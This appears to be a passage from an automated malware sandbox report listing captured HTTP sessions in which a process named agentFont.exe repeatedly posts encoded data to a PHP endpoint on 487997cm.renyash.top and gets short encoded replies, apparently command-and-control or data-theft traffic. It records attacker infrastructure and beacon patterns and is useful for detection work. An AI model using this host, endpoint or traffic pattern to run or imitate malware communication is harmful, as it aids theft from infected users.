                                                                                  Jan 1, 2025 11:28:46.504944086 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:46.862317085 CET1044OUTData Raw: 51 52 58 58 54 46 50 5d 59 5f 5b 52 5a 59 59 55 55 5f 54 50 51 50 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QRXXTFP]Y_[RZYYUU_TPQP[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.^<"-7-%[!,=/U%<%0*Z5P$?6)3"[9X?:&X"#\.$
                                                                                  Jan 1, 2025 11:28:47.169817924 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:47.303683043 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:43 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  115192.168.2.450118185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:47.439191103 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:47.784075022 CET1044OUTData Raw: 54 56 5d 59 54 44 55 58 59 5f 5b 52 5a 5d 59 5c 55 56 54 5b 51 5f 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TV]YTDUXY_[RZ]Y\UVT[Q_[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.[<"V7.82*@:>4%?X':#&1T$/6)$ "[9+:&X"#\.
                                                                                  Jan 1, 2025 11:28:48.095383883 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:48.230083942 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  116192.168.2.450119185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:48.349703074 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:48.707029104 CET1044OUTData Raw: 51 57 58 59 51 41 55 5f 59 5f 5b 52 5a 5d 59 5d 55 51 54 5f 51 5b 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QWXYQAU_Y_[RZ]Y]UQT_Q[[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\?26#[#&-@:%$,":0,5S*;59?:&X"#\.
                                                                                  Jan 1, 2025 11:28:48.990111113 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:49.122952938 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:45 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  117192.168.2.450120185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:49.257076979 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:49.612207890 CET1044OUTData Raw: 51 52 58 5e 54 42 55 50 59 5f 5b 52 5a 5e 59 57 55 55 54 58 51 59 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QRX^TBUPY_[RZ^YWUUTXQY[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?54$=*:>/S2&_0Y6%'R)<![!X+&X"#\.8
                                                                                  Jan 1, 2025 11:28:49.904753923 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:50.040101051 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:46 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  118192.168.2.450121185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:50.180238962 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  119192.168.2.450122185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:50.307903051 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1312
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:50.659172058 CET1312OUTData Raw: 54 50 5d 53 54 44 50 5a 59 5f 5b 52 5a 5d 59 56 55 53 54 5f 51 51 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TP]STDPZY_[RZ]YVUST_QQ[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(5S7=,1%-/U2?X$<X6%P'*'?#=Y+&X"#\.
                                                                                  Jan 1, 2025 11:28:50.973311901 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:51.107789040 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 27 5b 2a 36 3c 02 24 05 22 0f 33 00 3f 50 3c 23 04 1f 38 02 31 1f 31 3a 24 10 28 33 23 18 28 3b 2e 5e 3f 04 3f 05 31 0c 06 51 26 1f 2a 51 00 1c 23 5b 3c 15 23 58 3c 06 00 55 3d 31 28 06 28 5a 24 01 22 04 24 0d 24 05 22 57 33 13 2b 5d 3c 2f 2f 0c 2c 35 0a 02 2c 55 2c 00 27 0c 2f 52 09 14 22 05 2a 30 24 08 27 22 08 58 33 20 37 5d 35 01 23 55 34 32 25 1f 23 0d 23 58 3f 3d 15 59 21 32 3d 01 26 12 00 08 3c 3d 06 08 22 3e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: '[*6<$"3?P<#811:$(3#(;.^??1Q&*Q#[<#X<U=1((Z$"$$"W3+]<//,5,U,'/R"*0$'"X3 7]5#U42%##X?=Y!2=&<=">#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  120192.168.2.450123185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:50.426479101 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:50.784240961 CET1044OUTData Raw: 54 50 5d 52 54 46 55 58 59 5f 5b 52 5a 5c 59 57 55 50 54 59 51 50 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TP]RTFUXY_[RZ\YWUPTYQP[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.Z("= =[1>5.,2Y!%<%50/!)59Y(*&X"#\.0
                                                                                  Jan 1, 2025 11:28:51.082334042 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:51.214059114 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  121192.168.2.450124185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:51.331893921 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:51.690491915 CET1044OUTData Raw: 54 5b 5d 52 54 4a 50 5d 59 5f 5b 52 5a 5d 59 54 55 52 54 5d 51 5c 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[]RTJP]Y_[RZ]YTURT]Q\[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-)!>">'1-.,1<&^0,*Y#5P$Y2*/Z!*?&X"#\.
                                                                                  Jan 1, 2025 11:28:51.968322039 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:52.098198891 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:48 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  122192.168.2.450125185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:52.223464966 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:52.581047058 CET1044OUTData Raw: 51 55 58 5b 54 44 50 5c 59 5f 5b 52 5a 53 59 56 55 53 54 5d 51 58 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QUX[TDP\Y_[RZSYVUST]QX[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.)264>+2>@,-+%-'%6&-%<!Q*7;_5>=+&X"#\.
                                                                                  Jan 1, 2025 11:28:52.869333982 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:52.999875069 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:49 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  123192.168.2.450126185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:53.138638020 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:53.487217903 CET1044OUTData Raw: 54 5b 5d 52 54 4a 50 5a 59 5f 5b 52 5a 5c 59 50 55 57 54 5c 51 5b 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[]RTJPZY_[RZ\YPUWT\Q[[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW._(2)U 4[%-9:8$,!'.Z!"36>$'_6.&+*&X"#\.0
                                                                                  Jan 1, 2025 11:28:53.778939962 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:53.910923958 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:50 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  124192.168.2.450127185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:54.046004057 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:54.393476963 CET1044OUTData Raw: 54 54 5d 5a 54 4a 55 51 59 5f 5b 52 5a 52 59 56 55 53 54 5e 51 5f 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TT]ZTJUQY_[RZRYVUST^Q_[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.\+2S7-+1=9-2>X$,."5&0&)B0!%_+*&X"#\.
                                                                                  Jan 1, 2025 11:28:54.702841997 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:54.833950043 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  125192.168.2.450128185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:54.960140944 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:55.315342903 CET1044OUTData Raw: 51 51 5d 5f 54 4b 50 5c 59 5f 5b 52 5a 5e 59 52 55 5e 54 5a 51 50 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQ]_TKP\Y_[RZ^YRU^TZQP[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.?%S [;2.- 1/'/>!5V%,1Q*B365Y<&X"#\.8
                                                                                  Jan 1, 2025 11:28:55.597754002 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:55.726216078 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  126192.168.2.450129185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:55.847875118 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  127192.168.2.450130185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:56.118541956 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1324
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:56.471590042 CET1324OUTData Raw: 54 55 5d 5e 51 41 50 5d 59 5f 5b 52 5a 5a 59 53 55 53 54 5b 51 51 5b 59 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TU]^QAP]Y_[RZZYSUST[QQ[Y^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.+T"7&=-'V&/^$<9"%'/)$/[!==+*&X"#\.0
                                                                                  Jan 1, 2025 11:28:56.752249956 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:56.881484985 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 27 5a 29 18 2c 00 30 02 32 0f 24 10 28 09 2b 0d 2a 5d 38 3c 32 05 26 3a 0d 02 28 23 20 0c 2b 3b 07 04 2b 2d 34 11 25 32 24 51 24 25 2a 51 00 1c 23 5a 3e 28 37 1c 3f 3b 29 08 2a 1f 34 07 2b 12 23 10 35 3a 23 1f 27 38 3a 57 25 2e 27 59 3f 01 28 1f 2d 25 2f 16 2c 0d 01 5a 24 0c 2f 52 09 14 21 12 2b 23 24 0f 31 31 2e 5e 30 56 38 03 22 28 30 09 34 32 0b 51 20 55 23 11 28 2d 2b 13 22 0f 2e 11 32 12 22 44 3c 03 2b 57 35 3e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: 'Z),02$(+*]8<2&:(# +;+-4%2$Q$%*Q#Z>(7?;)*4+#5:#'8:W%.'Y?(-%/,Z$/R!+#$11.^0V8"(042Q U#(-+".2"D<+W5>#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  128192.168.2.450131185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:56.239485025 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:56.596666098 CET1044OUTData Raw: 51 51 5d 5b 54 47 55 5a 59 5f 5b 52 5a 53 59 54 55 57 54 50 51 5f 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
